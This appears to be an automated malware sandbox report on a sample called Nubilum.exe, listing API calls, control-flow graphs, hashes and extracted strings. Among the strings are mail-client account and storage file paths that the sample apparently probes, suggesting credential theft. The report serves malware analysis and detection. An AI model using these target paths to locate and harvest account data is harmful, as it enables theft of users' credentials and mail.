                          • _free.LIBCMT ref: 1FAB9315
                          • _free.LIBCMT ref: 1FAB9320
                          • _free.LIBCMT ref: 1FAB932B
                          • _free.LIBCMT ref: 1FAB9336
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction ID: fe00e543eabf9c471a703192da9603a56fff3ad22658bc1aae07b31222921031
                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction Fuzzy Hash: EB118135E40B08FEE620ABB0DE45FCB7BADAF48700F408C2CA69A76052EA2CB5445751

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 448 40642b-40644b GetSystemDirectoryW 449 40644d 448->449 450 40644f-406451 448->450 449->450 451 406462-406464 450->451 452 406453-40645c 450->452 454 406465-406498 wsprintfW LoadLibraryExW 451->454 452->451 453 40645e-406460 452->453 453->454
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406442
                          • wsprintfW.USER32 ref: 0040647D
                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406491
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3667692918.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.3667545006.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3667820784.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3668783744.000000000040A000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.00000000007DD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.000000000081D000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%S.dll$UXTHEME$\
                          • API String ID: 2200240437-1946221925
                          • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                          • Instruction ID: 5b72af1ba0dcc73f637375af4caef66d3bb1c1b07c81d60e398b344d0bd38167
                          • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                          • Instruction Fuzzy Hash: 44F0FC70500219A6DB14AB64DD0DF9B366CAB00704F10443AA546F10D0EBB8D725CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 455 1fab8821-1fab883a 456 1fab883c-1fab884c call 1fab9341 455->456 457 1fab8850-1fab8855 455->457 456->457 464 1fab884e 456->464 459 1fab8862-1fab8886 MultiByteToWideChar 457->459 460 1fab8857-1fab885f 457->460 462 1fab8a19-1fab8a2c call 1fab2ada 459->462 463 1fab888c-1fab8898 459->463 460->459 465 1fab889a-1fab88ab 463->465 466 1fab88ec 463->466 464->457 469 1fab88ca-1fab88db call 1fab56d0 465->469 470 1fab88ad-1fab88bc call 1fabbf20 465->470 468 1fab88ee-1fab88f0 466->468 473 1fab8a0e 468->473 474 1fab88f6-1fab8909 MultiByteToWideChar 468->474 469->473 480 1fab88e1 469->480 470->473 483 1fab88c2-1fab88c8 470->483 478 1fab8a10-1fab8a17 call 1fab8801 473->478 474->473 477 1fab890f-1fab892a call 1fab5f19 474->477 477->473 487 1fab8930-1fab8937 477->487 478->462 484 1fab88e7-1fab88ea 480->484 483->484 484->468 488 1fab8939-1fab893e 487->488 489 1fab8971-1fab897d 487->489 488->478 492 1fab8944-1fab8946 488->492 490 1fab89c9 489->490 491 1fab897f-1fab8990 489->491 495 1fab89cb-1fab89cd 490->495 493 1fab89ab-1fab89bc call 1fab56d0 491->493 494 1fab8992-1fab89a1 call 1fabbf20 491->494 492->473 496 1fab894c-1fab8966 call 1fab5f19 492->496 500 1fab8a07-1fab8a0d call 1fab8801 493->500 511 1fab89be 493->511 494->500 509 1fab89a3-1fab89a9 494->509 499 1fab89cf-1fab89e8 call 1fab5f19 495->499 495->500 496->478 508 1fab896c 496->508 499->500 512 1fab89ea-1fab89f1 499->512 500->473 508->473 513 1fab89c4-1fab89c7 509->513 511->513 514 1fab8a2d-1fab8a33 512->514 515 1fab89f3-1fab89f4 512->515 513->495 516 1fab89f5-1fab8a05 WideCharToMultiByte 514->516 515->516 516->500 517 1fab8a35-1fab8a3c call 1fab8801 516->517 517->478
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,1FAB6FFD,00000000,?,?,?,1FAB8A72,?,?,00000100), ref: 1FAB887B
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1FAB8A72,?,?,00000100,5EFC4D8B,?,?), ref: 1FAB8901
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1FAB89FB
                          • __freea.LIBCMT ref: 1FAB8A08
                            • Part of subcall function 1FAB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1FAB5702
                          • __freea.LIBCMT ref: 1FAB8A11
                          • __freea.LIBCMT ref: 1FAB8A36
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 9c642da0dc25f0049df2cdb36e469849982e2e1b43e30c2d5e9a7fc898459f07
                          • Instruction ID: 49f828ef1275e127c88a7829774d308b1a746e1838032aca8dd4835093f936c6
                          • Opcode Fuzzy Hash: 9c642da0dc25f0049df2cdb36e469849982e2e1b43e30c2d5e9a7fc898459f07
                          • Instruction Fuzzy Hash: 9151C172A20216AFDB15CE68CC81EAB77ADEB44750F12466DFC04D6140EB3DFC5296A0
                          APIs
                          • _strlen.LIBCMT ref: 1FAB1607
                          • _strcat.LIBCMT ref: 1FAB161D
                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1FAB190E,?,?,00000000,?,00000000), ref: 1FAB1643
                          • lstrcatW.KERNEL32(?,?), ref: 1FAB165A
                          • lstrlenW.KERNEL32(?,?,?,?,?,1FAB190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 1FAB1661
                          • lstrcatW.KERNEL32(00001008,?), ref: 1FAB1686
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: lstrcatlstrlen$_strcat_strlen
                          • String ID:
                          • API String ID: 1922816806-0
                          • Opcode ID: b987df60430916e2dc817114f7da2d8c5a4095b83983fb9e834558e6d90e7e91
                          • Instruction ID: 6a1bd4f4d65d9810c2c95faddde8b04d8bfef18e7054d2db9e9ce09f60d93d59
                          • Opcode Fuzzy Hash: b987df60430916e2dc817114f7da2d8c5a4095b83983fb9e834558e6d90e7e91
                          • Instruction Fuzzy Hash: 0C219836900314ABD7059F54DD84EEE77BCEF89720F24442EE905EB141EB3CB54687A5
                          APIs
                          • lstrcatW.KERNEL32(?,?), ref: 1FAB1038
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1FAB104B
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1FAB1061
                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 1FAB1075
                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 1FAB1090
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 1FAB10B8
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: lstrlen$AttributesFilelstrcat
                          • String ID:
                          • API String ID: 3594823470-0
                          • Opcode ID: 0def02dd74be57952f787e2edb2d44ec8352e6b1039f67c2774c901e766d4743
                          • Instruction ID: 3f8db414c31f83b8c3cfa36385a75a9d7c4e1230c5c6b26681f8e9534b3e1454
                          • Opcode Fuzzy Hash: 0def02dd74be57952f787e2edb2d44ec8352e6b1039f67c2774c901e766d4743
                          • Instruction Fuzzy Hash: A821833690032D9BCF10DB64ED58DDB377CEF44224F10425AE859971A1DA3DBA96CF81
                          APIs
                          • GetLastError.KERNEL32(?,?,1FAB3518,1FAB23F1,1FAB1F17), ref: 1FAB3864
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1FAB3872
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1FAB388B
                          • SetLastError.KERNEL32(00000000,?,1FAB3518,1FAB23F1,1FAB1F17), ref: 1FAB38DD
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: adf689a60e299e7eef09a90091dcfb750a473054ac35cf6bfb87598b7339c902
                          • Instruction ID: 3b05c4369de154d55c6e0656fd169672b441d0eb88057e4142134ad70919ae54
                          • Opcode Fuzzy Hash: adf689a60e299e7eef09a90091dcfb750a473054ac35cf6bfb87598b7339c902
                          • Instruction Fuzzy Hash: E201A7376097626EE20419FEACC49862B9CDB45675B21433DED10990E5EF1F78229345
                          APIs
                          • GetLastError.KERNEL32(?,?,1FAB6C6C), ref: 1FAB5AFA
                          • _free.LIBCMT ref: 1FAB5B2D
                          • _free.LIBCMT ref: 1FAB5B55
                          • SetLastError.KERNEL32(00000000,?,?,1FAB6C6C), ref: 1FAB5B62
                          • SetLastError.KERNEL32(00000000,?,?,1FAB6C6C), ref: 1FAB5B6E
                          • _abort.LIBCMT ref: 1FAB5B74
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: 330b2f9e13f5d86ea4cc75727ce571ea007113b42767aa2d3aab53d993523f9b
                          • Instruction ID: 33a7c65a66706462520878397cbebf5c5eadb8e895c316a7a47de5c8040c2ac7
                          • Opcode Fuzzy Hash: 330b2f9e13f5d86ea4cc75727ce571ea007113b42767aa2d3aab53d993523f9b
                          • Instruction Fuzzy Hash: 62F0FC7E504711BFD2422238EE44E4E2A6E9FC5A72B25012CF89596199FE2DA8035165
                          APIs
                            • Part of subcall function 1FAB1E89: lstrlenW.KERNEL32(?,?,?,?,?,1FAB10DF,?,?,?,00000000), ref: 1FAB1E9A
                            • Part of subcall function 1FAB1E89: lstrcatW.KERNEL32(?,?), ref: 1FAB1EAC
                            • Part of subcall function 1FAB1E89: lstrlenW.KERNEL32(?,?,1FAB10DF,?,?,?,00000000), ref: 1FAB1EB3
                            • Part of subcall function 1FAB1E89: lstrlenW.KERNEL32(?,?,1FAB10DF,?,?,?,00000000), ref: 1FAB1EC8
                            • Part of subcall function 1FAB1E89: lstrcatW.KERNEL32(?,1FAB10DF), ref: 1FAB1ED3
                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1FAB122A
                            • Part of subcall function 1FAB173A: _strlen.LIBCMT ref: 1FAB1855
                            • Part of subcall function 1FAB173A: _strlen.LIBCMT ref: 1FAB1869
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                          • API String ID: 4036392271-1520055953
                          • Opcode ID: d5a4064eab56250a833832b3e5d1a5ff91eb6701e9bbda3150b69449b723d543
                          • Instruction ID: 3ff0db6048fc0c941e7645abdfaf56b3c503b8ebf48c66af893ba2b55b078219
                          • Opcode Fuzzy Hash: d5a4064eab56250a833832b3e5d1a5ff91eb6701e9bbda3150b69449b723d543
                          • Instruction Fuzzy Hash: 4E218F79A10308AAEB1096A0EC91BEE7339EF80714F00155AF604EB1D0E6B97E818B59
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,007B5800,007B3000,004032EC,007B5800,007B5800,00403539), ref: 004063B8
                          • CharNextW.USER32(?,?,?,00000000), ref: 004063C7
                          • CharNextW.USER32(?,00000000,771B3420,007B5800,007B3000,004032EC,007B5800,007B5800,00403539), ref: 004063CC
                          • CharPrevW.USER32(?,?,771B3420,007B5800,007B3000,004032EC,007B5800,007B5800,00403539), ref: 004063DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3667692918.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.3667545006.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3667820784.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3668783744.000000000040A000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.00000000007DD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.000000000081D000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: *?|<>/":
                          • API String ID: 589700163-165019052
                          • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                          • Instruction ID: 3cdd18ac116859ddb672b661bfd00c9550f0de21ebdd483a5959fc1bc7d7dc3e
                          • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                          • Instruction Fuzzy Hash: 0011941580061295DB302B149D40FBBA2F8EF55764F56803FED8AB32C0E7BC5CA296ED
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,1FAB4AEA,?,?,1FAB4A8A,?,1FAC2238,0000000C,1FAB4BBD,00000000,00000000), ref: 1FAB4B59
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1FAB4B6C
                          • FreeLibrary.KERNEL32(00000000,?,?,?,1FAB4AEA,?,?,1FAB4A8A,?,1FAC2238,0000000C,1FAB4BBD,00000000,00000000,00000001,1FAB2082), ref: 1FAB4B8F
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 811cd5ae88f85cbb1ce9deb8e0371368ecbd22b12535a1a334f3ded9cc7f1e89
                          • Instruction ID: 9a49191397d3c6aab96a143eccdfb14a3db4e3266b11a119fcd6f742f324b0b4
                          • Opcode Fuzzy Hash: 811cd5ae88f85cbb1ce9deb8e0371368ecbd22b12535a1a334f3ded9cc7f1e89
                          • Instruction Fuzzy Hash: 62F04F35910218BBDB119F94CC58FDDBFBDEF04361F00416CE906A6160EB3E9A52CA92
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 1FAB715C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1FAB717F
                            • Part of subcall function 1FAB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1FAB5702
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1FAB71A5
                          • _free.LIBCMT ref: 1FAB71B8
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1FAB71C7
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: 61ae6b35d5c123234233054ef77e659e309923ce454a6932646215391b37d39f
                          • Instruction ID: 6e576cdb3701dac49ddbc60bd30b1af954080a72102e82e5c5a3a6f2d75ca85e
                          • Opcode Fuzzy Hash: 61ae6b35d5c123234233054ef77e659e309923ce454a6932646215391b37d39f
                          • Instruction Fuzzy Hash: 6301AC766012257F63120ABA6C8CDBB6D6DDEC6B60319012DFD04C7254FEAE9C0281F1
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000000,1FAB636D,1FAB5713,00000000,?,1FAB2249,?,?,1FAB1D66,00000000,?,?,00000000), ref: 1FAB5B7F
                          • _free.LIBCMT ref: 1FAB5BB4
                          • _free.LIBCMT ref: 1FAB5BDB
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB5BE8
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB5BF1
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 1eb1f3292c990cff801fa9528cfb26cc76db82116903d273e28391b25d870001
                          • Instruction ID: c070a2596dde73f56c0aa851428f2e615bd55177375f18f3b82bb4711928e875
                          • Opcode Fuzzy Hash: 1eb1f3292c990cff801fa9528cfb26cc76db82116903d273e28391b25d870001
                          • Instruction Fuzzy Hash: 2101287A204752BFC20316789DC4D5F2A6DDFC5671711012CF896D6259FE6EE8034164
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,1FAB10DF,?,?,?,00000000), ref: 1FAB1E9A
                          • lstrcatW.KERNEL32(?,?), ref: 1FAB1EAC
                          • lstrlenW.KERNEL32(?,?,1FAB10DF,?,?,?,00000000), ref: 1FAB1EB3
                          • lstrlenW.KERNEL32(?,?,1FAB10DF,?,?,?,00000000), ref: 1FAB1EC8
                          • lstrcatW.KERNEL32(?,1FAB10DF), ref: 1FAB1ED3
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat
                          • String ID:
                          • API String ID: 493641738-0
                          • Opcode ID: 0199f2eec0e8b104bbfb97a3566717c34fb267983d0cc6da1d8a428d727da2e5
                          • Instruction ID: 1e8ee5acc32d76ad98fa7e71efc2f449554cf0c97e3908d19f4b0c10d985132c
                          • Opcode Fuzzy Hash: 0199f2eec0e8b104bbfb97a3566717c34fb267983d0cc6da1d8a428d727da2e5
                          • Instruction Fuzzy Hash: 3FF08936100224BAD6212719ACD5EBF777CEFC6A70B04001DF50983190EB5D685392F6
                          APIs
                          • _free.LIBCMT ref: 1FAB91D0
                            • Part of subcall function 1FAB571E: HeapFree.KERNEL32(00000000,00000000,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?), ref: 1FAB5734
                            • Part of subcall function 1FAB571E: GetLastError.KERNEL32(?,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?,?), ref: 1FAB5746
                          • _free.LIBCMT ref: 1FAB91E2
                          • _free.LIBCMT ref: 1FAB91F4
                          • _free.LIBCMT ref: 1FAB9206
                          • _free.LIBCMT ref: 1FAB9218
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 715319a9a89d27ad0b3359d03c06bfbb82115bc87fbfe915e129fa591440750b
                          • Instruction ID: 79d6a6b0107b6b8888512e38e094cec1f492efe684a3dfd8a040d0cb895d382a
                          • Opcode Fuzzy Hash: 715319a9a89d27ad0b3359d03c06bfbb82115bc87fbfe915e129fa591440750b
                          • Instruction Fuzzy Hash: B3F06D71A143609BC650DB5DE6C4C8A7BFDEE483207604C4DF88AD7504EB3DF8D09A60
                          APIs
                          • _free.LIBCMT ref: 1FAB536F
                            • Part of subcall function 1FAB571E: HeapFree.KERNEL32(00000000,00000000,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?), ref: 1FAB5734
                            • Part of subcall function 1FAB571E: GetLastError.KERNEL32(?,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?,?), ref: 1FAB5746
                          • _free.LIBCMT ref: 1FAB5381
                          • _free.LIBCMT ref: 1FAB5394
                          • _free.LIBCMT ref: 1FAB53A5
                          • _free.LIBCMT ref: 1FAB53B6
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 4af081dce87818fcdddce9eca15ca0c87fc709a020efee557cc027f4b0e3248c
                          • Instruction ID: 48e2e248b88f0638ff83b71f767974596c145872283b4530db7abacd20d22e85
                          • Opcode Fuzzy Hash: 4af081dce87818fcdddce9eca15ca0c87fc709a020efee557cc027f4b0e3248c
                          • Instruction Fuzzy Hash: F6F054B4D25334DFC6015F2C96D04583BB9BB4AA30301098EF89497358E77F16639BD5
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\Nubilum.exe,00000104), ref: 1FAB4C1D
                          • _free.LIBCMT ref: 1FAB4CE8
                          • _free.LIBCMT ref: 1FAB4CF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user~1\AppData\Local\Temp\Nubilum.exe
                          • API String ID: 2506810119-965826885
                          • Opcode ID: 3be2c1ebb66c426e93ae72857b5ff1a95d539b880dfba48651a56d97703672f6
                          • Instruction ID: 6e051760493f48b9f2e6665e4e2ee5975b46b8c056317d63181a02d9abae58a7
                          • Opcode Fuzzy Hash: 3be2c1ebb66c426e93ae72857b5ff1a95d539b880dfba48651a56d97703672f6
                          • Instruction Fuzzy Hash: 9E317375A04358EFDB11DF99898499EBBFCEB86710F10409FED049B300D67DAA41CBA1
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,1FAB6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 1FAB8731
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1FAB87BA
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1FAB87CC
                          • __freea.LIBCMT ref: 1FAB87D5
                            • Part of subcall function 1FAB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1FAB5702
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: aa38a354b935c4476c747889871696affbfcdcb18bdd16dda4e7bc1e37ed7b12
                          • Instruction ID: 27b3bbca562f7a2b50e74de388b783bf013f8aaba015154d5400fda96d5c844d
                          • Opcode Fuzzy Hash: aa38a354b935c4476c747889871696affbfcdcb18bdd16dda4e7bc1e37ed7b12
                          • Instruction Fuzzy Hash: 03318D76A0021AAFDB15CF68CC84DEF7BB9EB44314F15016CEC0496154E73DE9A2CB90
                          APIs
